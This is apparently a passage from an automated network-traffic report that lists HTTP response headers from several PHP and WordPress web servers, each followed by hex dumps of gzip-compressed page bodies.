a0 c9 94 dc b1 92 28 a8 4b 96 c1 5e e4 e0 44 a3 08 ff 3d 9a a0 ae d4 8b 75 56 e4 7c 65 9d ee 81 53 9f 76 c7 b3 23 e6 3d ef d2 ae b6 79 17 53 57 6d 53 97 4b bd 74 76 22 5b 50 90 93 f9 7a 98 d5 d8 0c 59 19 a3 10 2b c6 de 93 c0 ab 13 6e c7 74 a3 cb 0f 3d 3b 7d 7a bf 2b c2 7c 5c d5 45 4d 31 70 4c 21 51 48 2d b5 27 66 e7 a8 76 0d e6 52 36 87 92 a0 e0 29 6d 34 a8 8b 60 d3 5b ec 5b 1c 44 2a f2 aa 62 bc 24 cf f3 dc 03 76 27 c2 69 2e ea 66 e8 00 ba 01 ef 61 0f 64 f6 6f 9b 3d 43 c9 8a 95 0d ee a4 44 f3 3f b0 3d d8 47 c3 1a 83 fe ad b9 61 a5 9b 93 8b 45 08 1c e4 1f 01 bb 8e 25 3f 48 b2 c2 e3 1a bb 71 ab 58 4d ef b0 c8 6e 40 f2 f1 bf 75 c8 36 fe 81 30 64 ac 6e f3 20 64 db b2 3a 9c ed ac b3 fb 36 d6 39 f9 5b c6 91 ee 40 7c b7 ad 69 a7 c8 e7 ea a0 c9 0f 7a 69 61 cd 37 b1 06 bc 61 39 53 6b 7b 25 0a 9e 03 02 26 ae e5
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Dec 2023 20:14:55 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1807Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 58 7b 6f db 38 12 ff 3b f9 14 ac 0e a8 9c 85 25 c5 69 17 68 93 d8 45 b7 cd 61 0b 64 af 41 93 de 62 d1 04 01 25 8d 2d 26 12 a9 92 94 15 6f 91 ef be c3 87 64 b9 97 dc a6 af 05 82 50 7c cc cc 6f 1e 9c 19 fa f0 d1 eb b7 af ce fe 38 39 22 85 ae ca d9 f6 d6 e1 a3 28 fa c0 e6 e4 cd 11 79 76 81 f3 ad 43 b3 41 6e aa 92 ab 69 50 68 5d ef 27 49 db b6 71 fb 24 16 72 91 4c 9e 3f 7f 9e dc 98 33 01 c9 4a aa f0 10 83 67 01 29 29 5f 4c 03 e0 81 e5 f9 01 78 ce e6 17 51 34 90 f0 68 64 64 ec 90 8b 99 59 f9 42 51 9b ec a3 e8 33 11 05 d0 dc 8c 15 68 4a 0c a7 08 3e 36 6c 39 0d 5e 09 ae 81 eb e8 6c 55 03 02 76 b3 69 a0 e1 46 27 86 f3 01 c9 0a 2a 15 e8 e9 fb b3 7f 47 a8 47 62 d8 68 a6 4b 98 1d 8b 05 79 c3 c9 e3 52 d1 8f 8d 38 20 af 41 4a 96 5d 93 c7 b4 aa 0f c8 2f 92 2d 16 6a 4c 8e 8f 4f c8 e3 7f 3d db 9b ec 1d 90 df 85 cc 4f 24 28 75 98 38 16 c8 ab 64 fc 9a 48 28 a7 61 ce 55 54 4b 98 83 ce 8a 90 14 f8 35 0d 93 44 c5 ad d1 36 34 92 07 87 95 5e 95 a0 0a 00 1d 12 96 23 31 55 05 43 fc 2a ca 94 0a 89 27 f7 46 cb 1d 32 ca f3 d4 a2 8a 33 51 25 6d 1d 31 9e 95 4d 0e 2a 41 9a a4 e7 10 57 8c c7 b8 f2 62 09 72 fa 73 fc 34 9e 3c 0d 89 46 03 4d 43 6b 17 2b a0 82 9c d1 69 48 cb f2 ef 90 a5 8d d6 df 82 cb d3 7f 67 54 73 21 ab 2f c2 44 73 04 60 01 59 d2 ef 0c a7 9c ec f2 af 43 63 28 bf 37 18 b1 60 5f 8b c6 90 7e 0d 1c 7f 37 39 ad f0 94 14 a9 d0 78 a6 bb 8f 21 17 8c e7 70 33 e6 82 ca ac 60 4b b8 83 06 2f 8e 94 20 07 54 4a 23 5a 1d 09 c4 8a fa b4 05 a0 52 52 28 e5 57 1c 8f 21 93 60 c9 a0 ad 85 d4 83 54 d0 b2 5c 17 d3 1c 96 2c 83 c8 4e 02 4f 97 74 59 25 15 f9 aa 4b 76 d6 00 84 8b e8 4a 11 67 47 9a 69 26 78 e4 36 d0 58 99 90 10 35 8c e0 76 46 4b 88 7c d2 52 99 64 b5 76 66 72 f9 e7 8a 2e a9 5b 35 07 b6 72 91 35 15 42 8a 8d b8 d8 8a fb 0f 82 26 53 72 cf 4e 2c a1 2e 69 06 a3 d0 c2 09 c7 21 fe db 39 40 59 89 63 6b b5 c8 d9 d2 38 dd 01 0f 5c da 9d cc 0e a9 f3 bc 4d bb ca e4 5d 4c 5d b5 49 5d 36 f5 06 b3 13 d1 82 84 9c a4 ab 61 56 a3 33 b4 ca c4 a8 b3 c1 f6 12 3d 23 64 30 3b 44 8f 08 be 98 1d bd 7b f7 f6 1d a2 70 b3 7d cc a2 68 14 09 99 26 8d 02 69 5c 41 84 24 35 ea 61 c4 c6 87 a9 b4 11 eb 07 4f f6 a4 67 40 a8 d6 50 d5 5a 61 38 57 94 71 c6 17 3d 4d 82 40 66 db 46 2b 73 6d bd 9b 2d 28 33 0f d6 18 dd d4 39 ab af 36 f7 05 bc 0b f3 ba a8 03 8c 63 5d 08 64 52 0b e5 fc b4 75 58 db 01 53 3b 4d a1 24 c8 78 1a 18 bd 2e bd 89 df 0f 74 3c 42 bc 25 79 99 e7 ce 7e 96 c2 53 33 5e 37 c3 78 08 d6 e0 1d ec 01 4f 42 25 a3 11 66 4c f4 6b 0a 79 ba da 34 7c 5f 89 0d cb 80 2c 69 d9 20 a3 80 28 f6 27 8e 7b bb 48 df 68 8c c6 9a 69 5a da 35 31 9f fb 30 c7 68 a9 ad 01 9d 4f 3d 27 23 3b 32 0e 8a 5a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1731Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 58 6d 6f db 36 10 fe 9c fc 0a 96 03 aa b4 b0 a4 38 ed 80 36 89 5d 74 6d 87 15 c8 b6 60 4d 37 0c 4d 10 50 d2 d9 62 22 91 2a 49 59 f1 8a fc f7 1d 5f 64 cb 5d b2 a5 6f 03 82 88 af 77 cf 3d 77 3c 1e 7d 78 ef e5 af 2f 4e fe 3c 7e 45 4a 53 57 d3 ed ad c3 7b 71 fc 8e cf c8 eb 57 e4 c9 19 f6 b7 0e ed 04 b9 aa 2b a1 27 b4 34 a6 d9 4f d3 ae eb 92 ee 51 22 d5 3c 1d 3f 7d fa 34 bd b2 6b 28 c9 2b a6 71 11 87 27 94 54 4c cc 27 14 04 75 32 df 81 28 f8 ec 2c 8e 07 1a ee ed 58 1d 0f c8 d9 d4 8e 7c a2 aa 4d f1 71 fc 91 8a 12 58 61 bf 35 18 46 ac a4 18 de b7 7c 31 a1 2f a4 30 20 4c 7c b2 6c 00 01 fb de 84 1a b8 32 a9 95 7c 40 f2 92 29 0d 66 f2 f6 e4 c7 18 ed 48 ad 18 c3 4d 05 d3 23 39 27 af 05 b9 5f 69 f6 be 95 07 e4 25 28 c5 f3 4b 72 9f d5 cd 01 f9 41 f1 f9 5c 8f c8 d1 d1 31 b9 ff dd 93 bd f1 de 01 f9 43 aa e2 58 81 d6 87 a9 17 81 b2 2a 2e 2e 89 82 6a 12 15 42 c7 8d 82 19 98 bc 8c 48 89 ad 49 94 a6 3a e9 ac b5 91 d5 3c 58 ac cd b2 02 5d 02 98 88 f0 02 37 33 5d 72 c4 af e3 5c eb 88 84 ed 81 b4 c2 23 63 a2 c8 1c aa 24 97 75 da 35 31 17 79 d5 16 a0 53 dc 93 ae 24 24 35 17 09 8e 3c 5b 80 9a 7c 9f 3c 4e c6 8f 23 62 90 a0 49 e4 78 71 0a 6a 28 38 9b 44 ac aa fe 0b 59 d6 1a f3 25 b8 c2 fe af 8c 6a 26 55 fd 49 98 58 81 00 1c 20 b7 f5 2b c3 a9 c6 bb e2 f3 d0 d8 9d 5f 1b 8c 9c f3 cf 45 63 b7 7e 0e 9c 70 36 05 ab 71 95 92 99 34 b8 a6 3f 8f 91 90 5c 14 70 35 12 92 a9 bc e4 0b b8 61 0f 1e 1c a5 40 0d 76 69 83 68 4d 2c 11 2b da d3 95 80 46 29 a9 75 18 f1 32 86 42 e8 82 43 d7 48 65 06 a9 a0 e3 85 29 27 05 2c 78 0e b1 eb d0 b0 2f ed b3 4a 26 8b 65 9f ec 1c 01 44 c8 f8 42 13 cf 23 cb 0d 97 22 f6 13 48 56 2e 15 c4 2d 27 38 9d b3 0a e2 90 b4 74 ae 78 63 3c 4d 3e ff 5c b0 05 f3 a3 76 c1 56 21 f3 b6 46 48 89 55 97 38 75 bf 20 68 32 21 b7 cc 24 0a 9a 8a e5 b0 13 39 38 d1 28 c2 7f 0f 0e 50 57 ea c5 3a 2b 0a be b0 4e f7 c0 a9 4f bb e3 e9 21 f3 9e 77 69 57 db bc 8b a9 ab b1 a9 cb a5 5e 3a 3d 96 1d 28 28 48 b6 1c 66 35 36 45 56 c6 d6 9c 0d b1 e7 e8 19 a9 e8 14 ad 34 4a 8a f9 f4 11 42 f0 2d c2 8c 81 ba 31 1a 43 b1 66 5c 70 31 4f 0e 33 e5 22 34 45 21 d3 6d 8b c8 1e b9 e0 22 27 d0 f6 e9 5a be ef 7a a2 57 37 c5 6d c1 ea 43 b4 29 1b 8a 31 68 4a 89 42 1a a9 3d c7 5b 87 8d fb 60 5a 66 19 54 04 05 4f 68 ab 41 9d 07 7a de 62 db e2 20 52 91 57 88 b7 22 cf 8b c2 db ee 76 84 dd 5c 34 ed d0 97 74 0d de c3 1e c8 24 4c 71 16 63 b6 43 9f 64 50 64 cb 4d d2 56 b7 a8 15 49 c9 82 55 2d 0a a2 44 f3 bf f0 bb b7 8b fb 5b 83 91 d4 70 c3 2a 37 26 67 b3 10 a2 e8 e9 c6 11 e8 fd 11 24 59 dd 71 83 cd b8 53 ac a1 b7 18 6c 17 a0 9b f1 bf 75 fd a6 79 03 61 48
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1800Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 58 6b 6f dc b6 12 fd 6c ff 0a 46 17 88 d6 c5 4a f2 ba b9 40 62 7b 37 48 13 17 0d e0 36 46 ec b4 28 62 c3 a0 a4 d9 15 6d 89 54 48 6a e5 6d e0 ff 7e 87 0f 69 b5 a9 7d eb bc 0a 18 a6 f8 9a 39 73 66 38 1c ee e1 a3 57 6f 5e 9e fd 79 72 44 0a 5d 95 b3 ed ad c3 47 51 f4 9e cd c9 eb 23 f2 f4 02 fb 5b 87 66 82 dc 54 25 57 d3 a0 d0 ba de 4f 92 b6 6d e3 f6 c7 58 c8 45 32 79 f6 ec 59 72 63 d6 04 24 2b a9 c2 45 0c 9e 06 a4 a4 7c 31 0d 80 07 56 e6 7b e0 39 9b 5f 44 d1 40 c3 a3 91 d1 b1 43 2e 66 66 e4 33 55 6d 8a 8f a2 4f 54 14 40 73 d3 56 a0 29 31 92 22 f8 d0 b0 e5 34 78 29 b8 06 ae a3 b3 55 0d 08 d8 f5 a6 81 86 1b 9d 18 c9 07 24 2b a8 54 a0 a7 ef ce 7e 8e d0 8e c4 88 d1 4c 97 30 3b 16 0b f2 9a 93 c7 a5 a2 1f 1a 71 40 5e 81 94 2c bb 26 8f 69 55 1f 90 9f 24 5b 2c d4 98 1c 1f 9f 90 c7 ff 79 ba 37 d9 3b 20 7f 08 99 9f 48 50 ea 30 71 22 50 56 c9 f8 35 91 50 4e c3 9c ab a8 96 30 07 9d 15 21 29 f0 6b 1a 26 89 8a 5b 63 6d 68 34 0f 16 2b bd 2a 41 15 00 3a 24 2c c7 cd 54 15 0c f1 ab 28 53 2a 24 7e bb 27 2d 77 c8 28 cf 53 8b 2a ce 44 95 b4 75 c4 78 56 36 39 a8 04 f7 24 bd 84 b8 62 3c c6 91 e7 4b 90 d3 ff c6 4f e2 c9 93 90 68 24 68 1a 5a 5e ac 82 0a 72 46 a7 21 2d cb 7f 42 96 36 5a 7f 0d 2e bf ff 1b a3 9a 0b 59 7d 16 26 9a 23 00 0b c8 6e fd c6 70 ca c9 2e ff 32 34 66 e7 b7 06 23 16 ec 4b d1 98 ad 5f 02 c7 9f 4d 4e 2b 5c 25 45 2a 34 ae e9 ce 63 c8 05 e3 39 dc 8c b9 a0 32 2b d8 12 ee d8 83 07 47 4a 90 83 5d 4a 23 5a 1d 09 c4 8a f6 b4 05 a0 51 52 28 e5 47 9c 8c a1 90 60 c9 a0 ad 85 d4 83 54 d0 b2 5c 17 d3 1c 96 2c 83 c8 76 02 bf 2f e9 b2 4a 2a f2 55 97 ec 2c 01 84 8b e8 4a 11 c7 23 cd 34 13 3c 72 13 48 56 26 24 44 0d 23 38 9d d1 12 22 9f b4 54 26 59 ad 1d 4d 2e ff 5c d1 25 75 a3 66 c1 56 2e b2 a6 42 48 b1 51 17 5b 75 bf 21 68 32 25 f7 cc c4 12 ea 92 66 30 0a 2d 9c 70 1c e2 bf 9d 03 d4 95 38 b1 d6 8a 9c 2d 8d d3 1d f0 c0 a5 dd c9 ec 90 3a cf db b4 ab 4c de c5 d4 55 9b d4 65 53 6f 30 3b 11 2d 48 c8 49 ba 1a 66 35 3a 43 56 26 c6 9c 0d b1 97 e8 19 21 83 d9 21 7a 44 f0 c5 ec e8 ed db 37 6f 11 85 eb ed 63 16 45 52 24 64 9a 34 0a a4 71 05 11 92 d4 68 87 51 1b 1f a6 d2 46 ac 6f fc b6 bd 5e 00 a1 5a 43 55 6b 85 e1 5c 51 c6 19 5f f4 7b 12 04 32 db 36 56 99 63 eb dd 6c 41 99 7e b0 c6 e8 ba ce 59 fd 6d 73 5f c0 bb 30 af 8b 3a c0 38 d6 85 40 21 b5 50 ce 4f 5b 87 b5 6d 30 b5 d3 14 4a 82 82 a7 81 b1 eb d2 53 fc 6e 60 e3 11 e2 2d c9 8b 3c 77 fc d9 1d 7e 37 e3 75 33 8c 87 60 0d de c1 1e c8 24 54 32 1a 61 c6 44 bf a6 90 a7 ab 4d e2 fb 9b d8 88 0c c8 92 96 0d 0a 0a 88 62 7f 61 bb b7 8b fb 1b 8d d1 58 33 4d 4b 3b 26 e6 73 1f e6 18 2d b5 25 d0 f9 d4 4b 32 ba 23 e3 a0 a8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Dec 2023 20:14:59 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1734Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 58 6d 6f dc 36 12 fe 6c ff 0a 86 07 44 4e b1 92 bc 6e 0e 48 6c ef 06 69 92 43 03 b8 57 e3 e2 5c 51 c4 86 41 49 b3 2b da 12 a9 90 d4 ca db c0 ff fd 86 2f d2 6a 7b f6 9d f3 56 c0 b0 f8 3a f3 cc 33 c3 e1 70 8f 1f bd fe f5 d5 d9 ef a7 6f 48 69 ea 6a be bb 73 fc 28 8e 3f f0 05 79 fb 86 3c bb c0 fe ce b1 9d 20 37 75 25 f4 8c 96 c6 34 87 69 da 75 5d d2 fd 98 48 b5 4c a7 cf 9f 3f 4f 6f ec 1a 4a f2 8a 69 5c c4 e1 19 25 15 13 cb 19 05 41 9d cc 0f 20 0a be b8 88 e3 91 86 47 7b 56 c7 13 72 31 b7 23 9f a9 6a 5b 7c 1c ff 49 45 09 ac b0 df 1a 0c 23 56 52 0c 1f 5b be 9a d1 57 52 18 10 26 3e 5b 37 80 80 7d 6f 46 0d dc 98 d4 4a 3e 22 79 c9 94 06 33 7b 7f f6 8f 18 ed 48 ad 18 c3 4d 05 f3 13 b9 24 6f 05 79 5c 69 f6 b1 95 47 e4 35 28 c5 f3 6b f2 98 d5 cd 11 f9 49 f1 e5 52 4f c8 c9 c9 29 79 fc b7 67 07 d3 83 23 f2 9b 54 c5 a9 02 ad 8f 53 2f 02 65 55 5c 5c 13 05 d5 2c 2a 84 8e 1b 05 0b 30 79 19 91 12 5b b3 28 4d 75 d2 59 6b 23 ab 79 b4 58 9b 75 05 ba 04 30 11 e1 05 6e 66 ba e4 88 5f c7 b9 d6 11 09 db 03 69 85 47 c6 44 91 39 54 49 2e eb b4 6b 62 2e f2 aa 2d 40 a7 b8 27 1d 24 24 35 17 09 8e bc 58 81 9a fd 3d 79 9a 4c 9f 46 c4 20 41 b3 c8 f1 e2 14 d4 50 70 36 8b 58 55 fd 3f 64 59 6b cc d7 e0 0a fb bf 31 aa 85 54 f5 67 61 62 05 02 70 80 dc d6 6f 0c a7 9a ee 8b 2f 43 63 77 7e 6b 30 72 c9 bf 14 8d dd fa 25 70 c2 d9 14 ac c6 55 4a 66 d2 e0 9a fe 3c 46 42 72 51 c0 cd 44 48 a6 f2 92 af e0 8e 3d 78 70 94 02 35 da a5 0d a2 35 b1 44 ac 68 4f 57 02 1a a5 a4 d6 61 c4 cb 18 0b a1 2b 0e 5d 23 95 19 a5 82 8e 17 a6 9c 15 b0 e2 39 c4 ae 43 c3 be b4 cf 2a 99 2c d6 7d b2 73 04 10 21 e3 2b 4d 3c 8f 2c 37 5c 8a d8 4f 20 59 b9 54 10 b7 9c e0 74 ce 2a 88 43 d2 d2 b9 e2 8d f1 34 f9 fc 73 c5 56 cc 8f da 05 3b 85 cc db 1a 21 25 56 5d e2 d4 fd 13 41 93 19 b9 67 26 51 d0 54 2c 87 bd c8 c1 89 26 11 fe 7b 72 84 ba 52 2f d6 59 51 f0 95 75 ba 07 4e 7d da 9d ce 8f 99 f7 bc 4b bb da e6 5d 4c 5d 8d 4d 5d 2e f5 d2 f9 a9 ec 40 41 41 b2 f5 38 ab b1 39 b2 32 b5 e6 6c 89 bd 44 cf 48 45 e7 68 a5 51 52 2c e7 07 08 c1 b7 08 33 06 ea c6 68 0c c5 9a 71 c1 c5 32 39 ce 94 8b d0 14 85 cc 77 2d 22 7b e4 82 8b 9c 40 db a7 1b f9 be eb 89 1e 6e 8a fb 82 d5 87 68 53 36 14 63 d0 94 12 85 34 52 7b 8e 77 8e 1b f7 c1 b4 cc 32 a8 08 0a 9e d1 56 83 ba 0c f4 bc c7 b6 c5 41 a4 22 6f 10 6f 45 5e 16 85 b7 dd ed 08 bb b9 68 da b1 2f e9 06 bc 87 3d 92 49 98 e2 2c c6 6c 87 3e c9 a0 c8 d6 db a4 0d b7 a8 15 49 c9 8a 55 2d 0a a2 44 f3 3f f0 7b b0 8f fb 5b 83 91 d4 70 c3 2a 37 26 17 8b 10 a2 e8 e9 c6 11 e8 fd 11 24 59 dd 71 83 cd b8 53 ac a1 f7 18 6c 17 a0 9b f1 bf 75 fd b6 79
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Dec 2023 20:15:00 GMTServer: ApacheX-Powered-By: PHP/8.1.26Cache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6Im5BRkFRdVJRM0dwWWpxdVQvQUd3akE9PSIsInZhbHVlIjoiQitwL0VNY2NUdHNOVWhoOWptSnQwS25sVVQ2WHJuYUxrWmV0dGlJZUR1VWtiYzI0VmVVYUF4V3Q0V1diOUNlZFpiV1ZrQ2VmTzM0SjU1djU3R1doNDkxVlhLUC9PZDkxVDJxb3hxTU84M0Zuem12dlFCQUNMa29vYXZOUEVEc24iLCJtYWMiOiIzYWQ5YWEwMjNkOTc2NDM3OWYyNTNjN2ZkMmNmYmI3OWZlNjExMDU1YjRjNmFjOTJiNzczZDdmZWYzOTM4ZDEzIiwidGFnIjoiIn0%3D; expires=Fri, 22 Dec 2023 22:15:00 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: isma_session=eyJpdiI6IkVTb1lJNE50dHo4bmNCM0hnMVZQZVE9PSIsInZhbHVlIjoiNjkzNmNKR2w1YWpNWTd2V2xBd2VJRVpaQWgwVHRBUEl0dTB1MHdSY3JrTnRQa3ZMMFMyRXdDOFdaNThiQnBqdWNVWGhOQzRkaEVmS0lFa2hWdEVUK3g2ZWFpWkZwLzd2TW5kOEFPakI1V0J0UjBDa2J2RDlicDVWeGVVNEFwcFYiLCJtYWMiOiI3OTcwNjNmOWQ4YWUyMDJhZmY1MjkwMDcwNWQ5ZjdiMGUxNDYwMTMxOTEzMzU0ZTg3YmNiOGUxMWZjNWY2MWJhIiwidGFnIjoiIn0%3D; expires=Fri, 22 Dec 2023 22:15:00 GMT; Max-Age=7200; path=/; httponly; samesite=laxVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1959Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5a dd 92 db b6 15 be f7 8c df 01 66 33 8d 76 66 21 ee 6e dc c4 23 8b 3b ad ed 6d e2 24 6e 1c e7 af 9d 4e a7 03 92 47 22 76 41 80 01 40 fd 24 e3 27 c8 55 9f a0 af d8 47 e8 01 48 51 e4 8a d2 6a 25 f7 a2 33 cb 0b 89 24 0e be 73 70 7e 81 23 8d 9f bc fa e6 e5 f7 7f 7b 7b 45 32 9b 8b cb c7 8f 1e 3f 1a bb bb c7 8f 08 5e 82 c9 69 14 80 24 41 f5 9c 32 cb a8 85 85 4d b9 86 c4 72 25 a3 40 58 5d 8f 26 82 19 13 05 41 8d 02 Data Ascii: Zf3vf!n#;m$nNG"vA@$'UGHQj%3$sp~#{{E2?^i$A2Mr%@X]&A
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Dec 2023 20:15:00 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1805Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 58 6b 6f dc b6 12 fd 6c ff 0a 46 17 88 d6 c5 4a f2 ba b9 40 62 7b 37 48 13 17 0d e0 36 46 ec b4 28 62 c3 a0 a4 d9 15 6d 89 54 48 6a e5 6d e0 ff 7e 87 0f 69 b5 a9 7d eb bc 0a 18 a6 f8 9a 39 73 66 38 1c ee e1 a3 57 6f 5e 9e fd 79 72 44 0a 5d 95 b3 ed ad c3 47 51 f4 9e cd c9 eb 23 f2 f4 02 fb 5b 87 66 82 dc 54 25 57 d3 a0 d0 ba de 4f 92 b6 6d e3 f6 c7 58 c8 45 32 79 f6 ec 59 72 63 d6 04 24 2b a9 c2 45 0c 9e 06 a4 a4 7c 31 0d 80 07 56 e6 7b e0 39 9b 5f 44 d1 40 c3 a3 91 d1 b1 43 2e 66 66 e4 33 55 6d 8a 8f a2 4f 54 14 40 73 d3 56 a0 29 31 92 22 f8 d0 b0 e5 34 78 29 b8 06 ae a3 b3 55 0d 08 d8 f5 a6 81 86 1b 9d 18 c9 07 24 2b a8 54 a0 a7 ef ce 7e 8e d0 8e c4 88 d1 4c 97 30 3b 16 0b f2 9a 93 c7 a5 a2 1f 1a 71 40 5e 81 94 2c bb 26 8f 69 55 1f 90 9f 24 5b 2c d4 98 1c 1f 9f 90 c7 ff 79 ba 37 d9 3b 20 7f 08 99 9f 48 50 ea 30 71 22 50 56 c9 f8 35 91 50 4e c3 9c ab a8 96 30 07 9d 15 21 29 f0 6b 1a 26 89 8a 5b 63 6d 68 34 0f 16 2b bd 2a 41 15 00 3a 24 2c c7 cd 54 15 0c f1 ab 28 53 2a 24 7e bb 27 2d 77 c8 28 cf 53 8b 2a ce 44 95 b4 75 c4 78 56 36 39 a8 04 f7 24 bd 84 b8 62 3c c6 91 e7 4b 90 d3 ff c6 4f e2 c9 93 90 68 24 68 1a 5a 5e ac 82 0a 72 46 a7 21 2d cb 7f 42 96 36 5a 7f 0d 2e bf ff 1b a3 9a 0b 59 7d 16 26 9a 23 00 0b c8 6e fd c6 70 ca c9 2e ff 32 34 66 e7 b7 06 23 16 ec 4b d1 98 ad 5f 02 c7 9f 4d 4e 2b 5c 25 45 2a 34 ae e9 ce 63 c8 05 e3 39 dc 8c b9 a0 32 2b d8 12 ee d8 83 07 47 4a 90 83 5d 4a 23 5a 1d 09 c4 8a f6 b4 05 a0 51 52 28 e5 47 9c 8c a1 90 60 c9 a0 ad 85 d4 83 54 d0 b2 5c 17 d3 1c 96 2c 83 c8 76 02 bf 2f e9 b2 4a 2a f2 55 97 ec 2c 01 84 8b e8 4a 11 c7 23 cd 34 13 3c 72 13 48 56 26 24 44 0d 23 38 9d d1 12 22 9f b4 54 26 59 ad 1d 4d 2e ff 5c d1 25 75 a3 66 c1 56 2e b2 a6 42 48 b1 51 17 5b 75 bf 21 68 32 25 f7 cc c4 12 ea 92 66 30 0a 2d 9c 70 1c e2 bf 9d 03 d4 95 38 b1 d6 8a 9c 2d 8d d3 1d f0 c0 a5 dd c9 ec 90 3a cf db b4 ab 4c de c5 d4 55 9b d4 65 53 6f 30 3b 11 2d 48 c8 49 ba 1a 66 35 3a 43 56 26 c6 9c 0d b1 97 e8 19 21 83 d9 21 7a 44 f0 c5 ec e8 ed db 37 6f 11 85 eb ed 63 16 45 52 24 64 9a 34 0a a4 71 05 11 92 d4 68 87 51 1b 1f a6 d2 46 ac 6f fc b6 49 2f 80 50 ad a1 42 f2 24 54 94 71 c6 17 fd 96 04 71 cc b6 8d 51 e6 d4 7a 2f 5b 4c a6 1f ac 21 ba ae f3 55 7f d9 dc 17 ef 2e ca eb a2 0e 30 8c 75 21 50 48 2d 94 73 d3 d6 61 6d 1b cc ec 34 85 92 a0 e0 69 60 cc ba f4 0c bf 1b 98 78 84 78 4b f2 22 cf 1d 7d 76 87 df cd 78 dd 0c c3 21 58 83 77 b0 07 32 09 95 8c 46 98 30 d1 ad 29 e4 e9 6a 93 f7 fe 22 36 22 03 b2 a4 65 83 82 02 a2 d8 5f d8 ee ed e2 fe 46 63 30 d6 4c d3 d2 8e 89 f9 dc 47 39 06 4b 6d 09 74 2e f5 92 8c ee c8 f8 27 6a 25
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Dec 2023 20:15:01 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1732Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 58 6d 6f dc 36 12 fe 6c ff 0a 86 07 44 4e b1 92 bc 6e 0e 48 6c ef 06 69 92 43 03 b8 57 e3 e2 5c 51 c4 86 41 49 b3 2b da 12 a9 90 d4 ca db c0 ff fd 86 2f d2 6a 7b f6 9d f3 56 c0 b0 f8 3a f3 cc 33 c3 e1 70 8f 1f bd fe f5 d5 d9 ef a7 6f 48 69 ea 6a be bb 73 fc 28 8e 3f f0 05 79 fb 86 3c bb c0 fe ce b1 9d 20 37 75 25 f4 8c 96 c6 34 87 69 da 75 5d d2 fd 98 48 b5 4c a7 cf 9f 3f 4f 6f ec 1a 4a f2 8a 69 5c c4 e1 19 25 15 13 cb 19 05 41 9d cc 0f 20 0a be b8 88 e3 91 86 47 7b 56 c7 13 72 31 b7 23 9f a9 6a 5b 7c 1c ff 49 45 09 ac b0 df 1a 0c 23 56 52 0c 1f 5b be 9a d1 57 52 18 10 26 3e 5b 37 80 80 7d 6f 46 0d dc 98 d4 4a 3e 22 79 c9 94 06 33 7b 7f f6 8f 18 ed 48 ad 18 c3 4d 05 f3 13 b9 24 6f 05 79 5c 69 f6 b1 95 47 e4 35 28 c5 f3 6b f2 98 d5 cd 11 f9 49 f1 e5 52 4f c8 c9 c9 29 79 fc b7 67 07 d3 83 23 f2 9b 54 c5 a9 02 ad 8f 53 2f 02 65 55 5c 5c 13 05 d5 2c 2a 84 8e 1b 05 0b 30 79 19 91 12 5b b3 28 4d 75 d2 59 6b 23 ab 79 b4 58 9b 75 05 ba 04 30 11 e1 05 6e 66 ba e4 88 5f c7 b9 d6 11 09 db 03 69 85 47 c6 44 91 39 54 49 2e eb b4 6b 62 2e f2 aa 2d 40 a7 b8 27 1d 24 24 35 17 09 8e bc 58 81 9a fd 3d 79 9a 4c 9f 46 c4 20 41 b3 c8 f1 e2 14 d4 50 70 